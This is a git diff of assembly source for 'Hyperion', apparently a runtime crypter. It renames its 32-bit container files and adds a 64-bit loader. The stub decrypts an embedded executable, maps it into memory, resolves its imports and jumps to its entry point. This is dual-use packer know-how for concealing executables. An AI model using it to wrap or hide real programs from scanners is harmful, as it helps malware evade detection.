+	writeRegisterToLog APITable, eax
+
+ssn_exit_success:
+	popad
+	mov eax,1
+	ret
+
+ssn_exit_error:
+	popad
+	sub eax,eax
+	ret
+endp;
+
+;check MZ und PE signature and return start of the image file header
+proc verifyPE stdcall, image_base:DWORD, section_size:DWORD
+
+local retval:DWORD
+
+	pushad
+	mov edx,[image_base]
+	mov ax,[edx+IMAGE_DOS_HEADER.e_magic]
+	cmp ax,IMAGE_DOS_SIGNATURE
+	jne vpe_exit_error
+	mov eax,[edx+IMAGE_DOS_HEADER.e_lfanew]
+	add edx,eax
+	mov eax,dword [edx]
+	cmp eax,IMAGE_NT_SIGNATURE
+	jne vpe_exit_error
+	add edx,4
+	mov [retval],edx
+
+vpe_exit_success:
+	popad
+	mov eax,[retval]
+	ret
+
+vpe_exit_error:
+	popad
+	sub eax,eax
+	ret
+
+endp
+
+;First 4 bytes of data seciton contain a checksum
+;Verify that the checksum is correct
+;TODO: CHECKSUM SIZE is atm hardcoded
+proc verifyChecksum stdcall, section_address:DWORD, section_size:DWORD
+
+	pushad
+	mov ebx,dword [section_address]
+	mov eax,[ebx]
+	add ebx,4
+	mov ecx,[section_size]
+	sub ecx,4
+	;checksum is in eax
+	;pointer to file in ebx
+	;size of file in ecx
+	sub edi,edi
+vs_calc_cs:
+	sub edx,edx
+	mov dl,byte [ebx]
+	add edi,edx
+	inc ebx
+	dec ecx
+	jnz vs_calc_cs
+	;calculated checksum is in edi
+	cmp edi,eax
+	jne vs_exit_error
+
+vs_exit_success:
+	popad
+	mov eax,1
+	ret
+
+vs_exit_error:
+	popad
+	sub eax,eax
+	ret
+
 endp
\ No newline at end of file
diff --git a/binary/hyperion/source/Src/FasmContainer32/logfile_disable.asm b/binary/hyperion/source/Src/Container/32/logfile_disable.asm
similarity index 95%
rename from binary/hyperion/source/Src/FasmContainer32/logfile_disable.asm
rename to binary/hyperion/source/Src/Container/32/logfile_disable.asm
index 277c91c..de2ead3 100644
--- a/binary/hyperion/source/Src/FasmContainer32/logfile_disable.asm
+++ b/binary/hyperion/source/Src/Container/32/logfile_disable.asm
@@ -1,25 +1,25 @@
-;writes a string and a newline to the logfile
-macro writeWithNewLine char_sequence, char_buffer, error_exit{
-    char_sequence char_buffer
-	mov eax,1
-}
-
-;write a string to the logfile
-macro writeLog apitable, content{
-	mov eax,1
-}
-
-;delete old log file and create a new one
-macro initLogFile apitable{
-	 mov eax,1
-}
-
-;write a newline into logfile
-macro writeNewLineToLog apitable{
-	mov eax,1
-}
-
-;write a register value into logile
-macro writeRegisterToLog apitable, value{
-	mov eax,1
+;writes a string and a newline to the logfile
+macro writeWithNewLine char_sequence, char_buffer, error_exit{
+    char_sequence char_buffer
+	mov eax,1
+}
+
+;write a string to the logfile
+macro writeLog apitable, content{
+	mov eax,1
+}
+
+;delete old log file and create a new one
+macro initLogFile apitable{
+	 mov eax,1
+}
+
+;write a newline into logfile
+macro writeNewLineToLog apitable{
+	mov eax,1
+}
+
+;write a register value into logile
+macro writeRegisterToLog apitable, value{
+	mov eax,1
 }
\ No newline at end of file
diff --git a/binary/hyperion/source/Src/FasmContainer32/logfile_enable.asm b/binary/hyperion/source/Src/Container/32/logfile_enable.asm
similarity index 95%
rename from binary/hyperion/source/Src/FasmContainer32/logfile_enable.asm
rename to binary/hyperion/source/Src/Container/32/logfile_enable.asm
index 993c16f..b2946f2 100644
--- a/binary/hyperion/source/Src/FasmContainer32/logfile_enable.asm
+++ b/binary/hyperion/source/Src/Container/32/logfile_enable.asm
@@ -1,251 +1,251 @@
-;-------------------------------------------
-;the content of this file is excluded,      |
-;when the user disables logging features    |
-;in hyperion command line. pls keep in mind |
-;and dont rely on its existence.            |
-;-------------------------------------------  
-
-;--- Begin Macro Section ---
-
-;writes a string and a newline to the logfile
-macro writeWithNewLine char_sequence, char_buffer, error_exit
-{
-	char_sequence char_buffer
-	lea eax,[str1]
-	stdcall writeLog_,[APITable],eax
-	test eax,eax
-	jz error_exit
-	stdcall writeNewLineToLog_,[APITable]
-	test eax,eax
-	jz error_exit
-}
-
-;write a string to the logfile
-macro writeLog apitable, content{
-	stdcall writeLog_,[apitable], content
-}
-
-;delete old log file and create a new one
-macro initLogFile apitable{
-	 stdcall initLogFile_, [apitable]
-}
-
-;write a newline into logfile
-macro writeNewLineToLog apitable{
-	stdcall writeNewLineToLog_, [apitable]
-}
-
-;write a register value into logile
-macro writeRegisterToLog apitable, value{
-	stdcall writeRegisterToLog_, [apitable], value
-}
-
-;--- End Macro Section ---
-
-;write  into log.txt
-;returns false if an eerror occurs
-proc writeLog_ stdcall APITable:DWORD, content:DWORD
-
-local str1[256]:BYTE, oldlogsize:DWORD, newlogsize:DWORD, contentsize:DWORD,\
-      filehandle:DWORD, filemappingobject:DWORD, mapaddress:DWORD, retval:DWORD
-
-	 pushad
-	 ;open file
-	 createStringLogTxt str1
-	 mov eax,[APITable]
-	 lea ebx,[str1]
-	 sub edx,edx
-	 stdcall dword [eax+CreateFile], ebx, GENERIC_READ or GENERIC_WRITE, FILE_SHARE_READ, edx, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, edx
-	 mov [retval],eax
-	 test eax,eax
-	 jz wl_logexit
-	 mov [filehandle],eax
-
-	 ;get logfile size
-	 mov eax,[APITable]
-	 stdcall dword [eax+GetFileSize], dword [filehandle], 0
-	 mov [oldlogsize],eax
-
-	 ;get size of string for logfile for concatenation
-	 stdcall strlen_, dword [content]
-	 mov [contentsize], eax
-	 add eax,dword [oldlogsize]
-	 mov [newlogsize], eax
-
-	 ;create the file mapping
-	 sub ebx,ebx
-	 mov edx,[APITable]
-	 stdcall dword [edx+CreateFileMapping], dword [filehandle], ebx, PAGE_READWRITE, ebx, eax, ebx
-	 mov [retval],eax
-	 test eax, eax
-	 jz wl_closelogfile
-	 mov [filemappingobject],eax
-
-	 sub ebx,ebx
-	 mov edx,[APITable]
-	 stdcall dword [edx+MapViewOfFile], eax, FILE_MAP_ALL_ACCESS, ebx, ebx, dword [newlogsize]
-	 mov [retval],eax
-	 test eax, eax
-	 jz wl_closemaphandle
-	 mov [mapaddress],eax
-
-	 ;copy string into map
-	 add eax,[oldlogsize]
-	 mov edi,eax
-	 mov esi,[content]
-	 mov ecx,[contentsize]
-	 repz movsb
-	 mov [retval],1
-
-wl_unmapfile:
-	 mov edx,[APITable]
-	 stdcall dword [edx+UnmapViewOfFile], dword [mapaddress]
-
-wl_closemaphandle:
-	 mov edx,[APITable]
-	 stdcall dword [edx+CloseHandle], dword [filemappingobject]
-
-wl_closelogfile:
-	 mov eax,[APITable]
-	 stdcall dword [eax+CloseHandle], dword [filehandle]
-
-wl_logexit:
-	 popad
-	 mov eax,[retval]
-	 ret;
-
-endp
-
-;adds a  to the logfile
-;returns false if an error occurs
-proc writeNewLineToLog_ APITable:DWORD
-
-local str1[3]:BYTE
-
-	 lea eax,[str1]
-	 mov byte [eax+0],13
-	 mov byte [eax+1],10
-	 mov byte [eax+2],0
-	 stdcall writeLog_, [APITable], eax
-	 ret
-
-endp
-
-;adds "" to the logfile
-;returns false if an error occurs
-proc writeRegisterToLog_ stdcall APITable:DWORD, Value:DWORD
-
-local str1[10]:BYTE, retval:DWORD
-
-	 pushad
-	 lea eax,[str1]
-	 stdcall binToString_, eax, [Value]
-	 stdcall writeLog_,[APITable],eax
-	 mov [retval],eax
-	 test eax,eax
-	 jz wrtl_exit
-	 stdcall writeNewLineToLog_,[APITable]
-	 mov [retval],eax
-	 test eax,eax
-	 jz wrtl_exit
-
-wrtl_exit:
-	 popad
-	 mov eax,[retval]
-	 ret
-
-endp
-
-;converts  into an 8 byte string and stores it 
-proc binToString_ stdcall buffer:DWORD, bin:DWORD
-
-	 pushad
-	 mov ebx,[bin]
-	 mov ecx,8
-
-bts_next_byte:
-	 mov eax,ebx
-	 and eax,0000000fh
-	 cmp eax,9
-	 jg bts_add_55
-bts_add_48:
-	 add eax,48
-	 jmp bts_store_bin
-bts_add_55:
-	 add eax,55
-bts_store_bin:
-	 dec ecx
-	 mov edx,[buffer]
-	 mov byte [ecx+edx],al
-	 test ecx,ecx
-	 jz bts_finished_conversion
-	 shr ebx,4
-	 jmp bts_next_byte
-
-bts_finished_conversion:
-	 mov eax,[buffer]
-	 mov byte [eax+8],0
-	 popad
-	 ret
-endp
-
-;get the length of a string
-proc strlen_ stdcall string_ptr:DWORD
-
-	 push edi
-	 push ecx
-	 mov edi,[string_ptr]
-	 sub ecx, ecx
-	 sub al, al
-	 not ecx
-	 cld
-	 repne scasb
-	 not ecx
-	 dec ecx
-	 mov eax,ecx
-	 pop ecx
-	 pop edi
-	 ret
-
-endp
-
-;Write initial message into logfile
-proc initLogFile_ stdcall APITable:DWORD
-
-local str1[256]:BYTE
-
-	pushad
-	createStringLogTxt str1
-	mov eax,[APITable]
-	lea ebx,[str1]
-	stdcall dword [eax+DeleteFile],ebx
-	createStringStartingHyperionLines str1
-	lea eax,[str1]
-	stdcall writeLog_,[APITable],eax
-	test eax,eax
-	jz ilf_exit_error
-	createStringStartingHyperion str1
-	lea eax,[str1]
-	stdcall writeLog_,[APITable],eax
-	test eax,eax
-	jz ilf_exit_error
-	createStringStartingHyperionLines str1
-	lea eax,[str1]
-	stdcall writeLog_,[APITable],eax
-	test eax,eax
-	jz ilf_exit_error
-	stdcall writeNewLineToLog_,[APITable]
-	test eax,eax
-	jz ilf_exit_error
-
-ilf_exit_success:
-	popad
-	mov eax,1
-	ret
-
-ilf_exit_error:
-	popad
-	sub eax,eax
-	ret
-
+;-------------------------------------------
+;the content of this file is excluded,      |
+;when the user disables logging features    |
+;in hyperion command line. pls keep in mind |
+;and dont rely on its existence.            |
+;-------------------------------------------  
+
+;--- Begin Macro Section ---
+
+;writes a string and a newline to the logfile
+macro writeWithNewLine char_sequence, char_buffer, error_exit
+{
+	char_sequence char_buffer
+	lea eax,[str1]
+	stdcall writeLog_,[APITable],eax
+	test eax,eax
+	jz error_exit
+	stdcall writeNewLineToLog_,[APITable]
+	test eax,eax
+	jz error_exit
+}
+
+;write a string to the logfile
+macro writeLog apitable, content{
+	stdcall writeLog_,[apitable], content
+}
+
+;delete old log file and create a new one
+macro initLogFile apitable{
+	 stdcall initLogFile_, [apitable]
+}
+
+;write a newline into logfile
+macro writeNewLineToLog apitable{
+	stdcall writeNewLineToLog_, [apitable]
+}
+
+;write a register value into logile
+macro writeRegisterToLog apitable, value{
+	stdcall writeRegisterToLog_, [apitable], value
+}
+
+;--- End Macro Section ---
+
+;write  into log.txt
+;returns false if an eerror occurs
+proc writeLog_ stdcall APITable:DWORD, content:DWORD
+
+local str1[256]:BYTE, oldlogsize:DWORD, newlogsize:DWORD, contentsize:DWORD,\
+      filehandle:DWORD, filemappingobject:DWORD, mapaddress:DWORD, retval:DWORD
+
+	 pushad
+	 ;open file
+	 createStringLogTxt str1
+	 mov eax,[APITable]
+	 lea ebx,[str1]
+	 sub edx,edx
+	 stdcall dword [eax+CreateFile], ebx, GENERIC_READ or GENERIC_WRITE, FILE_SHARE_READ, edx, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, edx
+	 mov [retval],eax
+	 test eax,eax
+	 jz wl_logexit
+	 mov [filehandle],eax
+
+	 ;get logfile size
+	 mov eax,[APITable]
+	 stdcall dword [eax+GetFileSize], dword [filehandle], 0
+	 mov [oldlogsize],eax
+
+	 ;get size of string for logfile for concatenation
+	 stdcall strlen_, dword [content]
+	 mov [contentsize], eax
+	 add eax,dword [oldlogsize]
+	 mov [newlogsize], eax
+
+	 ;create the file mapping
+	 sub ebx,ebx
+	 mov edx,[APITable]
+	 stdcall dword [edx+CreateFileMapping], dword [filehandle], ebx, PAGE_READWRITE, ebx, eax, ebx
+	 mov [retval],eax
+	 test eax, eax
+	 jz wl_closelogfile
+	 mov [filemappingobject],eax
+
+	 sub ebx,ebx
+	 mov edx,[APITable]
+	 stdcall dword [edx+MapViewOfFile], eax, FILE_MAP_ALL_ACCESS, ebx, ebx, dword [newlogsize]
+	 mov [retval],eax
+	 test eax, eax
+	 jz wl_closemaphandle
+	 mov [mapaddress],eax
+
+	 ;copy string into map
+	 add eax,[oldlogsize]
+	 mov edi,eax
+	 mov esi,[content]
+	 mov ecx,[contentsize]
+	 repz movsb
+	 mov [retval],1
+
+wl_unmapfile:
+	 mov edx,[APITable]
+	 stdcall dword [edx+UnmapViewOfFile], dword [mapaddress]
+
+wl_closemaphandle:
+	 mov edx,[APITable]
+	 stdcall dword [edx+CloseHandle], dword [filemappingobject]
+
+wl_closelogfile:
+	 mov eax,[APITable]
+	 stdcall dword [eax+CloseHandle], dword [filehandle]
+
+wl_logexit:
+	 popad
+	 mov eax,[retval]
+	 ret;
+
+endp
+
+;adds a  to the logfile
+;returns false if an error occurs
+proc writeNewLineToLog_ APITable:DWORD
+
+local str1[3]:BYTE
+
+	 lea eax,[str1]
+	 mov byte [eax+0],13
+	 mov byte [eax+1],10
+	 mov byte [eax+2],0
+	 stdcall writeLog_, [APITable], eax
+	 ret
+
+endp
+
+;adds "" to the logfile
+;returns false if an error occurs
+proc writeRegisterToLog_ stdcall APITable:DWORD, Value:DWORD
+
+local str1[10]:BYTE, retval:DWORD
+
+	 pushad
+	 lea eax,[str1]
+	 stdcall binToString_, eax, [Value]
+	 stdcall writeLog_,[APITable],eax
+	 mov [retval],eax
+	 test eax,eax
+	 jz wrtl_exit
+	 stdcall writeNewLineToLog_,[APITable]
+	 mov [retval],eax
+	 test eax,eax
+	 jz wrtl_exit
+
+wrtl_exit:
+	 popad
+	 mov eax,[retval]
+	 ret
+
+endp
+
+;converts  into an 8 byte string and stores it 
+proc binToString_ stdcall buffer:DWORD, bin:DWORD
+
+	 pushad
+	 mov ebx,[bin]
+	 mov ecx,8
+
+bts_next_byte:
+	 mov eax,ebx
+	 and eax,0000000fh
+	 cmp eax,9
+	 jg bts_add_55
+bts_add_48:
+	 add eax,48
+	 jmp bts_store_bin
+bts_add_55:
+	 add eax,55
+bts_store_bin:
+	 dec ecx
+	 mov edx,[buffer]
+	 mov byte [ecx+edx],al
+	 test ecx,ecx
+	 jz bts_finished_conversion
+	 shr ebx,4
+	 jmp bts_next_byte
+
+bts_finished_conversion:
+	 mov eax,[buffer]
+	 mov byte [eax+8],0
+	 popad
+	 ret
+endp
+
+;get the length of a string
+proc strlen_ stdcall string_ptr:DWORD
+
+	 push edi
+	 push ecx
+	 mov edi,[string_ptr]
+	 sub ecx, ecx
+	 sub al, al
+	 not ecx
+	 cld
+	 repne scasb
+	 not ecx
+	 dec ecx
+	 mov eax,ecx
+	 pop ecx
+	 pop edi
+	 ret
+
+endp
+
+;Write initial message into logfile
+proc initLogFile_ stdcall APITable:DWORD
+
+local str1[256]:BYTE
+
+	pushad
+	createStringLogTxt str1
+	mov eax,[APITable]
+	lea ebx,[str1]
+	stdcall dword [eax+DeleteFile],ebx
+	createStringStartingHyperionLines str1
+	lea eax,[str1]
+	stdcall writeLog_,[APITable],eax
+	test eax,eax
+	jz ilf_exit_error
+	createStringStartingHyperion str1
+	lea eax,[str1]
+	stdcall writeLog_,[APITable],eax
+	test eax,eax
+	jz ilf_exit_error
+	createStringStartingHyperionLines str1
+	lea eax,[str1]
+	stdcall writeLog_,[APITable],eax
+	test eax,eax
+	jz ilf_exit_error
+	stdcall writeNewLineToLog_,[APITable]
+	test eax,eax
+	jz ilf_exit_error
+
+ilf_exit_success:
+	popad
+	mov eax,1
+	ret
+
+ilf_exit_error:
+	popad
+	sub eax,eax
+	ret
+
 endp
\ No newline at end of file
diff --git a/binary/hyperion/source/Src/FasmContainer32/main.asm b/binary/hyperion/source/Src/Container/32/main.asm
similarity index 87%
rename from binary/hyperion/source/Src/FasmContainer32/main.asm
rename to binary/hyperion/source/Src/Container/32/main.asm
index 95b631d..8f64bfc 100644
--- a/binary/hyperion/source/Src/FasmContainer32/main.asm
+++ b/binary/hyperion/source/Src/Container/32/main.asm
@@ -1,133 +1,133 @@
-; Hyperion 32-Bit container.exe
-
-include 'image_base.inc'
-format PE GUI 4.0 at IMAGE_BASE
-entry start
-
-include '..\..\Fasm\fasminclude\win32a.inc'
-include '..\..\FasmAES-1.0\aes\aes.inc'
-include 'hyperion.inc'
-include 'createstrings.inc'
-include 'pe.inc'
-;automatically generated by hyperion cpp stub
-include 'key_size.inc'
-include 'infile_size.inc'
-include 'image_size.inc'
-;---
-
-;this contains the decrypted and loaded executable
-section '.bss' data readable writeable
-
-	 decrypted_infile: db IMAGE_SIZE dup (?)
-
-;--------------------------------------------------
-
-;this contains the encrypted exe
-section '.data' data readable writeable
-
-	 encrypted_infile: include 'infile_array.inc'
-
-;--------------------------------------------------
-
-section '.text' code readable executable
-
-;include necessary functions
-include 'logfile_select.asm'
-include 'loadapis.asm'
-include 'loadexecutable.asm'
-include 'decryptexecutable.asm'
-include '..\..\FasmAES-1.0\aes\aes.asm'
-
-start:	 stdcall MainMethod
-	 invoke ExitProcess,0
-
-proc MainMethod stdcall
-	 local str1[256]:BYTE,\
-	 APITable:DWORD,\
-	 CreateFileMapping_:DWORD,\
-	 MapViewOfFile_:DWORD,\
-	 UnmapViewOfFile_:DWORD,\
-	 CreateFile_:DWORD,\
-	 CloseHandle_:DWORD,\
-	 DeleteFile_:DWORD,\
-	 GetModuleHandle_:DWORD,\
-	 VirtualAlloc_:DWORD,\
-	 VirtualProtect_:DWORD,\
-	 VirtualFree_:DWORD
-
-	 ;pointer to the API table
-	 lea eax,[CreateFileMapping_]
-	 mov [APITable],eax
-
-	 ;load APIs for log file access
-	 stdcall loadLogAPIs,[APITable]
-	 test eax,eax
-	 jz main_exiterrornolog
-
-	 ;create logfile and write initial message into it
-	 initLogFile APITable 
-	 test eax,eax
-	 jz main_exiterrornolog
-
-	 ;load all necessary APIs
-	 stdcall loadRegularAPIs, [APITable]
-	 test eax,eax
-	 jz main_exiterror
-	 writeNewLineToLog APITable
-	 test eax,eax
-	 jz main_exiterror
-
-	 ;decrypt exe in data section
-	 stdcall decryptExecutable, [APITable], encrypted_infile
-	 test eax,eax
-	 jz main_exiterror
-
-	 ;load the executable at its image base
-	 ;(this will overwrite current MZ header and bss section)
-	 stdcall loadExecutable, [APITable], encrypted_infile
-	 test eax,eax
-	 jz main_exiterror
-
-	 ;start program execution
-	 mov edx,IMAGE_BASE
-	 mov eax,[edx+IMAGE_DOS_HEADER.e_lfanew]
-	 add eax,edx
-	 add eax,4
-	 ;image file header now in eax
-	 add eax,sizeof.IMAGE_FILE_HEADER
-	 mov eax,[eax+IMAGE_OPTIONAL_HEADER32.AddressOfEntryPoint]
-	 add eax,IMAGE_BASE
-	 ;entry point of original exe is now in eax
-	 jmp eax
-
-;finished without errors
-main_exitsuccess:
-	 writeNewLineToLog APITable
-	 createStringDone str1
-	 lea eax,[str1]
-	 writeLog APITable, eax
-	 ret
-
-;finished with errors after logfile API loading
-main_exiterror:
-	 writeNewLineToLog APITable
-	 createStringError str1
-	 lea eax,[str1]
-	 writeLog APITable, eax
-	 ret
-
-;finished with errors before logfile API loading
-main_exiterrornolog:
-	 ret
-
-endp
-
-;import table
-section '.idata' import data readable writeable
-
-	 library kernel,'KERNEL32.DLL'
-
-	 import kernel,\
-	    GetProcAddress,'GetProcAddress',\
-	    LoadLibrary,'LoadLibraryA',\
-	    ExitProcess,'ExitProcess'
+; Hyperion 32-Bit container.exe
+
+include 'image_base.inc'
+include 'main_prolog.inc' ;format PE ...
+entry start
+
+include '..\..\..\Fasm\INCLUDE\win32a.inc'
+include 'hyperion.inc'
+include 'createstrings.inc'
+include 'pe.inc'
+;automatically generated by hyperion cpp stub
+include 'key_size.inc'
+include 'infile_size.inc'
+include 'image_size.inc'
+;---
+
+;this contains the decrypted and loaded executable
+section '.bss' data readable writeable
+
+decrypted_infile: db IMAGE_SIZE dup (?)
+
+;--------------------------------------------------
+
+;this contains the encrypted exe
+section '.data' data readable writeable
+
+encrypted_infile: include 'infile_array.inc'
+
+;--------------------------------------------------
+
+section '.text' code readable executable
+
+;include necessary functions
+include 'logfile_select.asm'
+include 'loadapis.asm'
+include 'loadexecutable.asm'
+;automatically generated by hyperion cpp stub
+include 'decryption_payload.asm'
+;---
+
+start:	 stdcall MainMethod
+	 invoke ExitProcess,0
+
+proc MainMethod stdcall
+	 local str1[256]:BYTE,\
+	 APITable:DWORD,\
+	 CreateFileMapping_:DWORD,\
+	 MapViewOfFile_:DWORD,\
+	 UnmapViewOfFile_:DWORD,\
+	 CreateFile_:DWORD,\
+	 CloseHandle_:DWORD,\
+	 DeleteFile_:DWORD,\
+	 GetModuleHandle_:DWORD,\
+	 VirtualAlloc_:DWORD,\
+	 VirtualProtect_:DWORD,\
+	 VirtualFree_:DWORD
+
+	 ;pointer to the API table
+	 lea eax,[CreateFileMapping_]
+	 mov [APITable],eax
+
+	 ;load APIs for log file access
+	 stdcall loadLogAPIs,[APITable]
+	 test eax,eax
+	 jz main_exiterrornolog
+
+	 ;create logfile and write initial message into it
+	 initLogFile APITable 
+	 test eax,eax
+	 jz main_exiterrornolog
+
+	 ;load all necessary APIs
+	 stdcall loadRegularAPIs, [APITable]
+	 test eax,eax
+	 jz main_exiterror
+	 writeNewLineToLog APITable
+	 test eax,eax
+	 jz main_exiterror
+
+	 ;decrypt exe in data section
+	 stdcall decryptExecutable, [APITable], encrypted_infile
+	 test eax,eax
+	 jz main_exiterror
+
+	 ;load the executable at its image base
+	 ;(this will overwrite current MZ header and bss section)
+	 stdcall loadExecutable, [APITable], encrypted_infile
+	 test eax,eax
+	 jz main_exiterror
+
+	 ;start program execution
+	 mov edx,IMAGE_BASE
+	 mov eax,[edx+IMAGE_DOS_HEADER.e_lfanew]
+	 add eax,edx
+	 add eax,4
+	 ;image file header now in eax
+	 add eax,sizeof.IMAGE_FILE_HEADER
+	 mov eax,[eax+IMAGE_OPTIONAL_HEADER32.AddressOfEntryPoint]
+	 add eax,IMAGE_BASE
+	 ;entry point of original exe is now in eax
+	 jmp eax
+
+;finished without errors
+main_exitsuccess:
+	 writeNewLineToLog APITable
+	 createStringDone str1
+	 lea eax,[str1]
+	 writeLog APITable, eax
+	 ret
+
+;finished with errors after logfile API loading
+main_exiterror:
+	 writeNewLineToLog APITable
+	 createStringError str1
+	 lea eax,[str1]
+	 writeLog APITable, eax
+	 ret
+
+;finished with errors before logfile API loading
+main_exiterrornolog:
+	 ret
+
+endp
+
+;import table
+section '.idata' import data readable writeable
+
+	 library kernel,'KERNEL32.DLL'
+
+	 import kernel,\
+	    GetProcAddress,'GetProcAddress',\
+	    LoadLibrary,'LoadLibraryA',\
+	    ExitProcess,'ExitProcess'
diff --git a/binary/hyperion/source/Src/FasmContainer32/pe.inc b/binary/hyperion/source/Src/Container/32/pe.inc
similarity index 100%
rename from binary/hyperion/source/Src/FasmContainer32/pe.inc
rename to binary/hyperion/source/Src/Container/32/pe.inc
diff --git a/binary/hyperion/source/Src/Container/64/loadexecutable.asm b/binary/hyperion/source/Src/Container/64/loadexecutable.asm
new file mode 100644
index 0000000..d63f2bb
--- /dev/null
+++ b/binary/hyperion/source/Src/Container/64/loadexecutable.asm
@@ -0,0 +1,553 @@
+;Loads the exe which is stored in input_image
+;into memory and starts its execution
+proc loadExecutable input_image:QWORD
+
+local str1[256]:BYTE, ret_val:QWORD, image_file_header:QWORD,\
+loaded_file:QWORD
+
+	mov [input_image],rcx
+
+	;verify checksum of packed executable
+	writeWithNewLine createStringVerifyChecksum, str1, le_exit_error
+	fastcall verifyChecksum, [input_image], INFILE_SIZE
+	test rax,rax
+	jz le_exit_error
+
+	;verify whether the content of the data section is pe
+	writeWithNewLine createStringVerifyPE, str1, le_exit_error
+	mov rax,[input_image]
+	add rax,4
+	fastcall verifyPE, rax
+	test rax,rax
+	mov [image_file_header],rax
+	jz le_exit_error
+
+	;copy pe header and sections into memory
+	writeNewLineToLog le_exit_error
+	writeWithNewLine createStringMappingFileInMemory, str1, le_exit_error
+	mov rax,[input_image]
+	add rax,4
+	fastcall loadFile, [image_file_header], rax, INFILE_SIZE-4
+	test rax,rax
+	mov [loaded_file],rax
+	jz le_exit_error
+
+	;loading import table
+	writeNewLineToLog le_exit_error
+	writeWithNewLine createStringLoadingFilesAPIs, str1, le_exit_error
+	fastcall loadImportTable, [loaded_file]
+	test rax,rax
+	jz le_exit_error
+
+	;set the correct permissions for each section
+	writeNewLineToLog le_exit_error
+	writeWithNewLine createStringSettingPermissions, str1, le_exit_error
+	mov rax,[input_image]
+	add rax,4
+	fastcall setPermissions, [image_file_header], rax, INFILE_SIZE-4
+	test rax,rax
+	jz le_exit_error
+
+le_exit_success:
+	mov rax,1
+	ret
+
+le_exit_error:
+	sub rax,rax
+	ret
+
+endp
+
+;load the APIs in the import table
+proc loadImportTable uses rsi rdi rbx, image_base:QWORD
+
+local str1[256]:BYTE, import_table:QWORD, null_directory_entry[sizeof.IMAGE_IMPORT_DESCRIPTOR]:BYTE
+
+	mov [image_base], rcx
+
+	;find import table in data directory
+	mov rdx,[image_base]
+	mov eax,[rdx+IMAGE_DOS_HEADER.e_lfanew]
+	add rax,rdx
+	add rax,4
+	;image file header now in eax
+	add rax,sizeof.IMAGE_FILE_HEADER
+	lea rax,[rax+IMAGE_OPTIONAL_HEADER64.DataDirectory]
+	;first data directory entry now in eax
+	add rax,sizeof.IMAGE_DATA_DIRECTORY
+	;import data directory entry now in eax
+	mov eax,[rax+IMAGE_DATA_DIRECTORY.VirtualAddress]
+	add rax,rdx
+	;pointer to import table now in eax
+	mov [import_table],rax
+	writeWithNewLine createStringFoundImportTable, str1, le_exit_error
+	writeRegisterToLog [import_table], pit_exit_error
+
+	;init null directory entry
+	lea r8,[null_directory_entry]
+	mov rcx,sizeof.IMAGE_IMPORT_DESCRIPTOR
+	mov al,0
+pit_init_null_directory_loop:
+	mov [r8],al
+	inc r8
+	dec rcx
+	jnz pit_init_null_directory_loop
+
+	mov rbx,[import_table]
+	;iterate over the directory tables
+pit_next_directory_entry:
+	lea rsi,[null_directory_entry]
+	mov rdi,rbx
+	mov rcx,sizeof.IMAGE_IMPORT_DESCRIPTOR
+	rep cmpsb
+	je pit_exit_success
+	;load APIs of this directory
+	fastcall loadImportDirectoryTable, [image_base], rbx
+	test rax,rax
+	jz pit_exit_error
+	;next entry
+	add rbx,sizeof.IMAGE_IMPORT_DESCRIPTOR
+	jmp pit_next_directory_entry
+
+pit_exit_success:
+	mov eax,1
+	jmp pit_exit_ret
+
+pit_exit_error:
+	sub rax,rax
+
+pit_exit_ret:
+	ret
+
+endp
+
+;loads the APIs
+proc loadImportDirectoryTable uses rbx r12, image_base:QWORD, directory_entry:QWORD
+
+local str1[256]:BYTE, lookup_table:QWORD, import_address_table:QWORD, dll_image_base:QWORD
+
+	mov [image_base],rcx
+	mov [directory_entry],rdx
+
+	;write info about data directory table to logfile
+	writeNewLineToLog lidt_exit_error
+	writeWithNewLine createStringProcessImportDirectory, str1, lidt_exit_error
+	mov rax,[directory_entry]
+	mov eax,[rax+IMAGE_IMPORT_DESCRIPTOR.Name_]
+	add rax,[image_base]
+	mov rbx,rax
+	;pointer to dll name in ebx
+	writeLog rax, lidt_exit_error
+	writeNewLineToLog lidt_exit_error
+
+	;load the corresponding dll
+	invoke LoadLibrary, rbx
+	test rax,rax
+	jz lidt_exit_error
+	mov [dll_image_base],rax
+
+	;read pointers to the api tables
+	mov rdx,[directory_entry]
+	mov eax,[rdx+IMAGE_IMPORT_DESCRIPTOR.FirstThunk]
+	add rax,[image_base]
+	mov [import_address_table],rax
+	;check whether OriginalFirstThunk exists and can be used
+	mov eax,[rdx+IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk]
+	test eax,eax
+	jnz lidt_use_original_first_thunk
+	;in some binaries, OriginalFirstThunk table is empty
+	;in this case, use FirstThunk insteadt to fetch API names or ordinals
+	mov eax,[rdx+IMAGE_IMPORT_DESCRIPTOR.FirstThunk]
+lidt_use_original_first_thunk:
+	add rax,[image_base]
+	mov [lookup_table],rax
+
+	;index to current API
+	sub r12,r12
+	;iterate the lookup_table entries
+lidt_next_lookup_entry:
+	mov rcx,r12
+	mov rax,[lookup_table]
+	add rax,r12 ;counter is in r12
+	mov rax,[rax] ;get entry (64 bit in PE+)
+	test rax,rax
+	jz lidt_exit_success
+	mov rbx,rax
+	mov rcx,IMAGE_ORDINAL_FLAG64
+	and rax,rcx
+	jnz lidt_byordinal
+lidt_byname:
+	createStringName str1
+	writeLog rax, lidt_exit_error
+	add rbx,[image_base] ;according to spec, first 32 bits are 0, therefore add is possible
+	lea rbx,[rbx+IMAGE_IMPORT_BY_NAME.Name_]
+	mov rax,rbx ;pointer to API name is now in rax and rbx
+	writeLog rax, lidt_exit_error
+	writeNewLineToLog lidt_exit_error
+	;API name pointer in rbx
+	invoke GetProcAddress, [dll_image_base], rbx
+	test rax,rax
+	jz lidt_exit_error
+	mov rbx,[import_address_table]
+	add rbx,r12
+	mov [rbx],rax
+	;fetch next API
+	add r12,8 ;size of entries in import lookup table and import address table is 8 in PE+
+	jmp lidt_next_lookup_entry
+
+lidt_byordinal:
+	createStringOrdinal str1
+	writeLog rax, lidt_exit_error
+	;remove the ordinal flag
+	mov rcx,IMAGE_ORDINAL_FLAG64
+	xor rbx,rcx
+	mov rax,rbx
+	writeRegisterToLog rax, lidt_exit_error
+	;API ordinal in rbx
+	invoke GetProcAddress, [dll_image_base], rbx
+	test rax,rax
+	jz lidt_exit_error
+	mov rbx,[import_address_table]
+	add rbx,r12
+	mov [rbx],rax
+	;fetch next API
+	add r12,8
+	jmp lidt_next_lookup_entry
+
+lidt_exit_success:
+	mov rax,1
+	jmp lidt_exit_ret
+
+lidt_exit_error:
+	sub rax,rax
+
+lidt_exit_ret:
+	ret
+
+endp;
+
